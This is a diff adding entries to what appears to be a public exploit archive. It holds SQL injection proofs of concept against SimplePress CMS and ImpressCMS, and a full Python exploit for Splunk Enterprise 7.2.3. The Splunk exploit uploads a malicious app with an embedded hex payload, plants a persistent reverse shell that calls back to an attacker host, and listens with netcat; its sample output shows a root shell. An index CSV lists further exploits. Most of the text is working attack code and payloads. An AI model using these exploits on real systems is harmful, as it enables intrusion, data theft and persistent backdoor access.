+# Exploit Title: SimplePress CMS 1.0.7 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-24
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://sourceforge.net/projects/simplepresscms/
+# Software Link: https://ayera.dl.sourceforge.net/project/simplepresscms/1.0%20alpha/1.0.7_alpha.zip
+# Version: 1.0.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/?p=[SQL]
+# 
+
+GET /[PATH]/?p=%2d%31%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29,(%34%29%2c%28%35%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%29%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: NO_CACHE=1; CAKEPHP=72i3s18s3sk0mn2c63gi0pikq0; PHPSESSID=i9sb2qgkcblm5l47uv4d3h2vm1
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Wed, 23 Jan 2019 22:38:49 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 3169
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/?s=[SQL]
+# 
+
+GET /[PATH]/?s=%27)%2d%31%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29,(%34%29%2c%28%35%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%29%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: NO_CACHE=1; CAKEPHP=72i3s18s3sk0mn2c63gi0pikq0; PHPSESSID=i9sb2qgkcblm5l47uv4d3h2vm1
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Wed, 23 Jan 2019 22:42:44 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 3280
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/46239.txt

@@ -0,0 +1,28 @@
+# Title: ImpressCMS 1.3.11 - 'bid' SQL Injection
+# Date: 21.01.2019
+# Exploit Author: Mehmet Onder Key
+# Vendor Homepage: http://www.impresscms.org/
+# Software Link:
+https://sourceforge.net/projects/impresscms/files/v1.3.11/impresscms_1.3.11.zip
+# Version: v1.3.11
+# Category: Webapps
+# Tested on: WAMPP @Win
+# Software description:
+ImpressCMS is a community developed Content Management System. With this
+tool maintaining the content of a website becomes as easy as writing a word
+document. ImpressCMS is the ideal tool for a wide range of users: from
+business to community users, from large enterprises to people who want a
+simple, easy to use blogging tool.
+
+# Vulnerabilities:
+# An attacker can access all data following an un/authorized user login
+using the parameter.
+
+
+# POC - SQLi :
+
+# Parameter: bid (POST)
+# Request URL: http://localhost/impress/modules/system/admin.php?bid=12
+
+#    Type : time-based blind
+bid=12') AND SLEEP(5) AND ('Bjhx'='Bjhx&fct=blocksadmin&op=up&rtn=Lw==

exploits/windows/webapps/46238.py

@@ -0,0 +1,172 @@
+#!/usr/bin/python
+
+# Exploit Title: Splunk Enterprise 7.2.3 Custom App RCE (persistent backdoor)
+# Date: January 23, 2019
+# Exploit Author: Lee Mazzoleni
+# Vendor Homepage: https://www.splunk.com/
+# Software Link: https://www.splunk.com/en_us/download/splunk-enterprise.html
+# Version: 7.2.3
+# Tested on: kali 4.18.0-kali2-amd64
+# CVE : n/a
+
+from selenium import webdriver
+from selenium.webdriver.common.keys import Keys
+from time import sleep
+from sys import stdout,argv
+from os import getcwd,path,system
+from subprocess import Popen
+
+# Download and unpack the correct version for your OS from here: github.com/mozilla/geckodriver/releases
+gecko_driver_path = '/root/Desktop/SplunkSploit/Gecko/geckodriver'
+
+def checkLogin(url):
+	if '/login' not in url and '/logout' not in url:
+		print 'Login successful!'
+	else:
+		print 'Login failed! Aborting...'
+		exit()
+
+
+def checkUrl(url):
+	if '_upload' not in url:
+		print '[-] Navigation error, aborting...'
+		exit()
+
+
+def exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass, lport):
+	print '[+] Starting bot ...'
+	profile = webdriver.FirefoxProfile()
+	profile.accept_untrusted_certs = True
+	driver = webdriver.Firefox(firefox_profile=profile, executable_path=gecko_driver_path)
+
+	print '[*] Loading the target page ...'
+	driver.get(splunk_target_url)
+	sleep(1)
+
+	stdout.write('[*] Attempting to log in with the provided credentials ... ')
+	username_field = driver.find_element_by_name("username")
+	username_field.clear()
+	username_field.send_keys(splunk_admin_user)
+	sleep(1)
+
+	pw_field = driver.find_element_by_name("password")
+	pw_field.clear()
+	pw_field.send_keys(splunk_admin_pass)
+	pw_field.send_keys(Keys.RETURN)
+	sleep(3)
+
+	current_url = driver.current_url
+	checkLogin(current_url)
+
+	url = driver.current_url.split('/')
+	upload_url = url[0] + '//' + str(url[2]) + '/' + url[3] + '/manager/appinstall/_upload'
+	print '[*] Navigating to the uploads page ({}) ...'.format(upload_url)
+	driver.get(upload_url)
+	sleep(1)
+
+	current_url = driver.current_url
+	checkUrl(current_url)
+
+	form = driver.find_element_by_tag_name("form")
+	input = form.find_element_by_id("appfile")
+	input.send_keys(getcwd()+'/'+'splunk-shell.tar.gz')
+	force_update = driver.find_element_by_id("force")
+	force_update.click()
+	submit_button = driver.find_element_by_class_name("splButton-primary")
+	submit_button.click()
+
+	print '[*] Your persistent shell has been successfully uploaded!'
+	driver.quit()
+	print '[+] Preparing to catch shell ... (this may take up to 1 minute)'
+	system('nc -lvp {}'.format(lport))
+
+
+def generatePayload(lhost, lport):
+	# this hex decodes into the evil splunk app (tar.gz file) that we will be uploading as the payload
+	# after the app is written to disk, a reverse shell is created and added to the app (it uses the user-supplied lhost and lport parameters to create the shell)
+	# the app configuration sets it to be enabled upon installation (restarting splunk / manually enabling it is not required.)
+	# this is a PERSISTENT backdoor, there is no need to re-upload multiple times... the backdoor will reconnect every 10-20 seconds
+	print '[*] Creating Splunk App...'
+	shell = '1f8b080030e9485c0003ed5b6b6fdb3614cd67fd0a221e9036ab65bd95b87b206b332c5830144bda0e705d8396689b8b446aa214271bf6df7749d9895f8993d451da95e7432c91145f87e7f25e89115952b2b3a6189124696d3d0e2c40e8fbea17b0f8abae6dd7731c3b702c1fd26dc70ead2de43f527fe6508a02e7086de59c17b7955b97ff8542ccf29ff0083fc22a50fc2ff37e0bffaee36bfe6bc10afe7196991167838db521090e6ee11fb85fe0df0bc2700b591bebc12df8caf9ef50061390245d037e0a82be4784e17e4262c3e894b46b50d13ba782420a64d99098e09245239277e13ac3d1191e92ae0109d1596fc0f35e99c5508d50859f7a6c1aeb31a7ff3e658fe103dc63fff71cdf95fb7fe885dafed78139fe535260902fdef022b8bfffe7867affaf07abf98fc900974961ca844f6f4312ec79de8dfcbbaebbc07fe078b6deffeb40a76be0282242eed839c1316aa30eda45dd17689c53f00726b772b3cf79265a82b038c53469750d7291f1bc80e7c4a528486af0312339dc32dee7f1a561341a0df4eee8f0fdc9e9c1e9e1491b9173c220334f71824a417281c48897498cfa04499703151c45d00768558c704e62744ec958b92502dabfbeb963979f7a6abf08acd6bf0a0436a4fef5fe7fe8840bfaf743dbd2faaf031d88f65a931860fadb13bccc23d2535ebd28d3ae710e6aa59c81e042d3315d23e57141531512f89ebfef04e19e65865610ec419c6f8158676b55a2bd531da1e9eebbaee35475dc51e68b66686d3b7bbe6beefb76e8dad77d95a1ceba07617c96e9d976b01f5c3f781d0e4dcd1f8e53caee5a99ebb87bd7954de2a9d6523875e7ce795635aa3bf33fa77fe803d865686ab30ee0fdfd3fcf0eb5ff5f0b6ee05f6a96461b5a06f7e7dff78240f35f076ee71f12121ac125676624c403db58e3ffbb8ee7ccf32fff3a7affaf03ad5df46a84d910bcef11b8e15986123ee408763462222448a1d247840e47456b4ce36284605f4297e021209ac266f5026181c6b07ae4af2c9b612803aebcbc5625d06ecb30a1e66359f13f060254f5b591e766172f914a5275b7d19e05292aa10f9be130e7258bdba8cc9367d33549d3614b9c8173318d525bd51aeec98ef7fa093c66666cf81c428d664e3288279085acaacedea7543aa483a54aff350c98c1d3326708366739e4c9f328e3824add5036447ca0b2b64f549de80d1fc3f4c6db73532d27a96a73923d335daddd5df50ba5d05b16f13425ac2266c093848f651b096544a067630ab3bf1353a80a5fee2019b491bca0443c979c40c03556cfa996659b55f568f2401b3553fe779332595b13e6263aab26ee2a7f92d58708e1eca5ac60a983aadfaa1be391f4d30a72515c65a2262a670720207fccd1ce352fb37d46742057da4e0ca33b83d589e627b01ac5425333839a215b72bdbd96ecacaab7225d552957d2f62ceb22ca61ca25f9a8c831131904aaac585e5d0f6e1056d95d1a8461ca214a2d1e1d063359d1a5cc0218577f56b3a316f53c3b8f4fcec6d8b9d2795dec5cd9804db333b1858e3b357c29ce8794350b9eb5edabc4ca3c06bebcaf8c8e514a7e465448614ff4a9b4cd30c405139323bfe55525956cabb6e40338fe13763e84133a648a6fc5941ca909c41a74b0aa2a048d517665405e4c3788b93eb4617a187909a39bd8fd5f207823f9fb1c2e21401ad913a316f184e7ed46e862df9f98e7993e4ef60618eb53ef90ff6f2c7cff1d8a47f800f480f7fff293b0f6ff6bc032fff2ed2e5c6cb08d75efff2dcb5e8cffbd50bfffab05dabc7eddb851ffa6bdb1361ea0ffc0d1e77f6a81d6ffd78d39fd4fe39f0db7f100ff2fb0b5ff570b56f2af3ef56fee0ce83afb6f078bf6df0f1cfdfeb7163420ec7e37f9b6587d596c74a6673cba46e3e7a3c3e3d707c7470727cd540c698cbe4729fc3d3841ead6681cfe71fafbc1abd3e65f2a6ffa64e7e3876e77f743b7fd417cfbecc7ef20f387cec77677f7795bef379f1756ea7fc327c0a5c66f3bffe1848be7bf7dc70db4feebc0acfe6dd3322da3317d912b5ff8c955408765ae3e01a2014d88612c1f198fa9a8ce8cdf7080048a387b83fd20d8b78965937ee0c5b11b39837e1085180ff62c2f8afca88ffbcefeaa63e7039c086224b84f126963e4526d42e7b429d90056ea9fb2ac2c36e700acddffc3a5f39ff080d67f1d58a5ff57ea10a6409821b512d4770c81d30cd4288f079a205211e5342bdaad96a9fe6b40ad1f33bbec1a535b004ab5c01e14243fc709b22da3b209c565a6245d322ddfcf0137e83f2617646306609dfe9d65fddbdaffaf074bfa37670dc054f56a41ac3003102ba87b8814463c256fe4d10f04f2fee6e4cdf1dbdf7eedbdfea9551568c57da311f124bea588cc96c58a111e93aae0aa625536147ceaa9d3d0d0d0d0d0d0d0d0d0d0d0d0d0d0d0d0d0f8ecf11f88a26c5b00500000'
+	bytes = shell.decode('hex')
+	f = open('splunk-shell.tar.gz','wb')
+	f.write(bytes)
+	f.close()
+	print '\t==> Adding reverse shell (to {}:{}) to the app...'.format(lhost,lport)
+	f = open('shell.py','w')
+	f.write('import sys,socket,os,pty\n')
+	f.write('ip="{}"\n'.format(lhost))
+	f.write('port="{}"\n'.format(lport))
+	f.write('s=socket.socket()\n')
+	f.write('s.connect((ip,int(port)))\n')
+	f.write('[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\n')
+	f.write('pty.spawn("/bin/sh")\n')
+	f.close()
+	decompress_cmd = 'tar zxvf splunk-shell.tar.gz &>/dev/null; rm splunk-shell.tar.gz'
+	p = Popen(decompress_cmd, shell=True, executable='/bin/bash')
+	p.wait()
+	move_cmd = 'mv shell.py splunk-shell/bin/'
+	p = Popen(move_cmd, shell=True, executable='/bin/bash')
+	p.wait()
+	compress_cmd = 'tar zcvf splunk-shell.tar.gz splunk-shell/ &>/dev/null; rm -r splunk-shell/'
+	p = Popen(compress_cmd, shell=True, executable='/bin/bash')
+	p.wait()
+	if path.isfile('splunk-shell.tar.gz'):
+		print '\t==> Payload Ready! (splunk-shell.tar.gz)'
+
+
+def showUsage():
+	print '\n\tScript Usage: {} <targetUrl> <username> <password> <lhost> <lport>'.format(argv[0])
+        print '\tExample: {} http://192.168.4.16:8000 admin changeme 192.168.4.5 4444\n'.format(argv[0])
+
+
+if len(argv) != 6:
+	showUsage()
+	exit()
+
+if not path.isfile(gecko_driver_path):
+	print '\n\t[!] This program requires geckodriver, download the corresponding version for your OS from the following link:'
+	print '\t\t==> https://github.com/mozilla/geckodriver/releases'
+	print '\n\t[!] Extract the geckodriver binary, then add its full path to line 20 of this script.'
+	print '\t\t==> gecko_driver_path = "/tmp/geckodriver"\n'
+	exit()
+
+splunk_target_url = argv[1]
+splunk_admin_user = argv[2]
+splunk_admin_pass = argv[3]
+lhost = argv[4]
+lport = argv[5]
+generatePayload(lhost, lport)
+exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass, lport)
+
+
+
+
+
+
+####################
+## SCRIPT OUTPUT: ##
+####################
+# root@kali:~/SplunkSploit# python splunksploit.py
+#
+#	Script Usage: splunksploit.py <targetUrl> <username> <password> <lhost> <lport>
+#	Example: splunksploit.py http://192.168.4.16:8000 admin changeme 192.168.4.5 4444
+#
+# root@kali:~/SplunkSploit# python splunksploit.py http://172.16.224.194:8000/ admin changeme 172.16.224.190 4444
+# [*] Creating Splunk App...
+# 	==> Adding reverse shell (to 172.16.224.190:4444) to the app...
+# 	==> Payload Ready! (splunk-shell.tar.gz)
+# [+] Starting bot ...
+# [*] Loading the target page ...
+# [*] Attempting to log in with the provided credentials ... Login successful!
+# [*] Navigating to the uploads page (http://172.16.224.194:8000/en-US/manager/appinstall/_upload) ...
+# [*] Your persistent shell has been successfully uploaded!
+# [+] Preparing to catch shell ... (this may take up to 1 minute)
+# Ncat: Version 7.70 ( https://nmap.org/ncat )
+# Ncat: Listening on :::4444
+# Ncat: Listening on 0.0.0.0:4444
+# Ncat: Connection from 172.16.224.195.
+# Ncat: Connection from 172.16.224.195:48902.
+# # whoami
+# whoami
+# root

files_exploits.csv

@@ -6270,6 +6270,7 @@ id,file,description,date,author,type,platform,port
 46205,exploits/windows/dos/46205.js,"Microsoft Edge Chakra - 'JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode' Use-After-Free",2019-01-18,"Google Security Research",dos,windows,
 46208,exploits/linux/dos/46208.c,"Linux Kernel 4.13 - 'compat_get_timex()' Leak Kernel Pointer",2019-01-21,wally0813,dos,linux,
 46216,exploits/windows/dos/46216.py,"Echo Mirage 3.1 - Buffer Overflow (PoC)",2019-01-21,"InitD Community",dos,windows,
+46236,exploits/macos/dos/46236.py,"Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)",2019-01-24,"Saeed Hasanzadeh",dos,macos,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10240,6 +10241,7 @@ id,file,description,date,author,type,platform,port
 46188,exploits/windows/local/46188.txt,"Microsoft Windows CONTACT - Remote Code Execution",2019-01-17,hyp3rlinx,local,windows,
 46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows,
 46222,exploits/windows/local/46222.txt,"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution",2019-01-23,hyp3rlinx,local,windows,
+46241,exploits/linux/local/46241.rb,"AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit)",2019-01-24,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17114,6 +17116,7 @@ id,file,description,date,author,type,platform,port
 46215,exploits/linux/remote/46215.rb,"GattLib 0.2 - Stack Buffer Overflow",2019-01-21,"Dhiraj Mishra",remote,linux,
 46218,exploits/windows/remote/46218.py,"CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt",2019-01-22,T3jv1l,remote,windows,8888
 46220,exploits/windows/remote/46220.txt,"Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution",2019-01-22,"Eduardo Braun Prado",remote,windows,
+46242,exploits/linux/remote/46242.txt,"Ghostscript 9.26 - Pseudo-Operator Remote Code Execution",2019-01-24,"Google Security Research",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40710,3 +40713,10 @@ id,file,description,date,author,type,platform,port
 46230,exploits/php/webapps/46230.txt,"Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
 46231,exploits/php/webapps/46231.txt,"Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,
 46232,exploits/php/webapps/46232.txt,"Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
+46233,exploits/php/webapps/46233.txt,"Joomla! Component J-CruisePortal 6.0.4 - SQL Injection",2019-01-24,"Ihsan Sencan",webapps,php,80
+46234,exploits/php/webapps/46234.txt,"Joomla! Component JHotelReservation 6.0.7 - SQL Injection",2019-01-24,"Ihsan Sencan",webapps,php,80
+46235,exploits/php/webapps/46235.txt,"SimplePress CMS 1.0.7 - SQL Injection",2019-01-24,"Ihsan Sencan",webapps,php,80
+46237,exploits/cgi/webapps/46237.txt,"SirsiDynix e-Library 3.5.x - Cross-Site Scripting",2019-01-24,AkkuS,webapps,cgi,80
+46238,exploits/windows/webapps/46238.py,"Splunk Enterprise 7.2.3 - Authenticated Custom App RCE",2019-01-24,"Lee Mazzoleni",webapps,windows,8000
+46239,exploits/php/webapps/46239.txt,"ImpressCMS 1.3.11 - 'bid' SQL Injection",2019-01-24,"Mehmet Onder",webapps,php,80
+46240,exploits/hardware/webapps/46240.html,"Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery",2019-01-24,"Ali Can Gönüllü",webapps,hardware,80